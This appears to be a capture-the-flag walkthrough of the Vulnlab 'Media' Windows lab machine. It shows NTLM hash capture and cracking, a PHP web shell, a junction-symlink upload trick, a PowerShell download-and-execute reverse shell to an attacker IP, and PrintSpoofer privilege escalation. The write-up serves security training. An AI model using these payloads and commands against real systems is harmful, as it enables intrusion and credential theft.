In this walk through, we will be going through the Media room from Vulnlab. This room is rated as Medium on the platform and it consist of abusing of file upload functionality by creating documents to capture user NTLM hash, cracking it will give us initial access to the target. For Privilege Escalation, abuse of symlinks have to be done to upload a webshell on the target to get access as NT AUTHORITY/LOCAL SERVICE. At last, used FullPower exploit along with PrintSpoofer to get root on the target. So, let’s get started without any delay.
Table of Contents
Machine Info:
Title | Media |
IPaddress | 10.10.76.57 |
Difficulty | Medium |
OS | Windows |
Description | Media is a Medium Windows machine that requires abusing of file upload functionality by creating documents to capture user NTLM hash, cracking it will give us initial access to the target. For Privilege Escalation, abuse of symlinks have to be done to upload a webshell on the target to get access as NT AUTHORITY/LOCAL SERVICE. At last, used FullPower exploit along with PrintSpoofer to get root on the target. |
Enumeration:
- I started off with a regular nmap scan along with all TCP port scan. Found 3 ports opened – 22 (SSH), 80 (HTTP) and 3389 (RDP).
$ sudo nmap -sV -sC 10.10.76.57 Starting Nmap 7.80 ( https://nmap.org ) at 2024-04-22 17:18 IST Nmap scan report for 10.10.76.57 Host is up (0.19s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH for_Windows_8.1 (protocol 2.0) | ssh-hostkey: | 3072 0b:b3:c0:80:40:88:e1:ae:aa:3b:5f:f4:c2:23:c0:0d (RSA) | 256 e0:80:3f:dd:b1:f8:fc:83:f5:de:d5:b3:2d:5a:4b:39 (ECDSA) |_ 256 b5:32:c0:72:18:10:0f:24:5d:f8:e1:ce:2a:73:5c:1f (ED25519) 80/tcp open http Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.1.17) |_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17 |_http-title: ProMotion Studio 3389/tcp open ms-wbt-server Microsoft Terminal Services | rdp-ntlm-info: | Target_Name: MEDIA | NetBIOS_Domain_Name: MEDIA | NetBIOS_Computer_Name: MEDIA | DNS_Domain_Name: MEDIA | DNS_Computer_Name: MEDIA | Product_Version: 10.0.20348 |_ System_Time: 2024-04-22T11:49:20+00:00 | ssl-cert: Subject: commonName=MEDIA | Not valid before: 2024-04-21T11:45:58 |_Not valid after: 2024-10-21T11:45:58 |_ssl-date: 2024-04-22T11:49:26+00:00; -2s from scanner time. Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: -2s, deviation: 0s, median: -2s Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 28.55 seconds
$ sudo nmap -p- -T5 10.10.76.57 Starting Nmap 7.80 ( https://nmap.org ) at 2024-04-22 17:19 IST Nmap scan report for 10.10.76.57 Host is up (0.20s latency). Not shown: 65532 filtered ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 3389/tcp open ms-wbt-server Nmap done: 1 IP address (1 host up) scanned in 292.96 seconds
PORT 80 (HTTP)
- The web server running on port 80 consist of a static website of a Design studio.
- The about section displays some potentials employee names.
- Found a file upload functionality. As per its description, it accepts video file for the HR. We can abuse it later to get a reverse shell on the target.
- Fired gobuster on the target to reveal some hidden directories, specially the one which we can use to trigger our file uploads but didn’t found any.
$ gobuster dir -u http://10.10.76.57/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt -x asp,aspx =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.76.57/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /home/wh1terose/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Extensions: asp,aspx [+] Timeout: 10s =============================================================== 2024/04/22 17:35:26 Starting gobuster in directory enumeration mode =============================================================== /js (Status: 301) [Size: 332] [--> http://10.10.76.57/js/] /css (Status: 301) [Size: 333] [--> http://10.10.76.57/css/] /assets (Status: 301) [Size: 336] [--> http://10.10.76.57/assets/] /webalizer (Status: 403) [Size: 420] /phpmyadmin (Status: 403) [Size: 420] /examples (Status: 503) [Size: 401] /licenses (Status: 403) [Size: 420] /server-status (Status: 403) [Size: 420] /con (Status: 403) [Size: 301] /con.asp (Status: 403) [Size: 301] /con.aspx (Status: 403) [Size: 301] /aux (Status: 403) [Size: 301] /aux.aspx (Status: 403) [Size: 301] /aux.asp (Status: 403) [Size: 301] =============================================================== 2024/04/22 17:53:10 Finished ===============================================================
Exploitation:
- As i know that the file upload functionality expects a media file. So, i create one with ntlm_ theft script. If all goes well and the user checks our media file, we will be able to capture their NetNTLMV2 hash with Responder.
python3 ntlm_theft.py -g wax -s 10.8.2.6 --filename media
- Like i suspected, got the user “enox” hash and then cracked it using john.
sudo python3 Responder.py -I tun0
enox::MEDIA:66ce4d0cf1dfba48:A699AB188E409F8B8728A5468931D5FE:01010000000000008061F754DE94DA01F6CEC41CB6ADCA4600000000020008004800500038004E0001001E00570049004E002D004A004400510043004E0046005A00570039003100320004003400570049004E002D004A004400510043004E0046005A0057003900310032002E004800500038004E002E004C004F00430041004C00030014004800500038004E002E004C004F00430041004C00050014004800500038004E002E004C004F00430041004C00070008008061F754DE94DA0106000400020000000800300030000000000000000000000000300000F60DD5F3E407850FA06D5F0AAD3B5CBB61CA844B9BB06C0F4949449785EEBED50A0010000000000000000000000000000000000009001A0063006900660073002F00310030002E0038002E0032002E0036000000000000000000
sudo john --wordlist=/usr/share/wordlists/rockyou.txt enox.hash
enox: 1234virus@
- Logged into the machine via SSH with enox creds and captured the local flag.
Privilege Escalation:
- Looked around the file system and found the source directory of the application. Peeking inside the index.php file reveals some really interesting information.
<?php error_reporting(0); // Your PHP code for handling form submission and file upload goes here. $uploadDir = 'C:/Windows/Tasks/Uploads/'; // Base upload directory if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_FILES["fileToUpload"])) { $firstname = filter_var($_POST["firstname"], FILTER_SANITIZE_STRING); $lastname = filter_var($_POST["lastname"], FILTER_SANITIZE_STRING); $email = filter_var($_POST["email"], FILTER_SANITIZE_STRING); // Create a folder name using the MD5 hash of Firstname + Lastname + Email $folderName = md5($firstname . $lastname . $email); // Create the full upload directory path $targetDir = $uploadDir . $folderName . '/'; // Ensure the directory exists; create it if not if (!file_exists($targetDir)) { mkdir($targetDir, 0777, true); } // Sanitize the filename to remove unsafe characters $originalFilename = $_FILES["fileToUpload"]["name"]; $sanitizedFilename = preg_replace("/[^a-zA-Z0-9._]/", "", $originalFilename); // Build the full path to the target file $targetFile = $targetDir . $sanitizedFilename; if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $targetFile)) { echo "<script>alert('Your application was successfully submitted. Our HR shall review your video and get back to you.');</script>"; // Update the todo.txt file $todoFile = $uploadDir . 'todo.txt'; $todoContent = "Filename: " . $originalFilename . ", Random Variable: " . $folderName . "\n"; // Append the new line to the file file_put_contents($todoFile, $todoContent, FILE_APPEND); } else { echo "<script>alert('Uh oh, something went wrong... Please submit again');</script>"; } } ?>
- We now know that the Uploads from the application is stored in “C:/Windows/Tasks/Uploads/” directory and the folder name is calculated using the MD5 hash of firstname, lastname and email in the upload form.
// Create a folder name using the MD5 hash of Firstname + Lastname + Email $folderName = md5($firstname . $lastname . $email);
- I created a shell.php file with the following web shell contents.
<?php echo system($_GET['c']); ?>
- As we already know, how the upload folder is being created. So, we now can predict our uploads folder beforehand. I quickly calculated a MD5 hash of firstnamelastnameemail.
echo -n "[email protected]" | md5sum 50246ad7e7c5f6c75808fe08f5dfcb6e
- So, we can use symlinks or junction to abuse this. For this, we will first create the directory we have predicted, then will delete it and create a symlink of it to the root of the application folder that is C:\xampp\htdocs. Post that, we will able to upload and include our webshell to the root directory and thus can get command execution.
# Creating and removing our predicted directory mkdir 50246ad7e7c5f6c75808fe08f5dfcb6e rmdir 50246ad7e7c5f6c75808fe08f5dfcb6e # Creating symlink mklink /J C:\Windows\Tasks\Uploads\50246ad7e7c5f6c75808fe08f5dfcb6e C:\xampp\htdocs\
- Uploading the shell.php webshell with our specified values for first name, lastname and email.
- Got our webshell working as user local service. Let’s upgrade it to a full blown reverse shell with powercat.
Powershell IEX(New-Object System.Net.WebClient).DownloadString('http://10.8.2.6:8000/powercat.ps1');powercat -c 10.8.2.6 -p 445 -e cmd
- Now that we have access to the target as a local service. We can use FullPowers exploit in order to enable all the privileges on the target.
Exploit – https://github.com/itm4n/FullPowers.git
Exploit – https://github.com/itm4n/PrintSpoofer/releases
- We can now abuse the enabled SEImpersonate privilege using PrintSpoofer exploit to get shell as NT AUTHORITY/ SYSTEM.
PrintSpoofer.exe -i c cmd
Also Read: Vulnlab – Feedback
Conclusion:
So that was “Media” for you. We started off with a regular nmap scan and found 3 ports opened – 22 (SSH), 80 (HTTP) and 3389 (RDP). Enumerated the webserver on port 80 and found a file upload functionality. Abused it by creating documents using ntlm_theft script to capture user NTLM hash, cracking it gave us initial access to the target. For Privilege Escalation, we abused symlinks to upload a webshell on the target which gave us access as NT AUTHORITY/LOCAL SERVICE. At last, used FullPower exploit along with PrintSpoofer to get root on the target. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.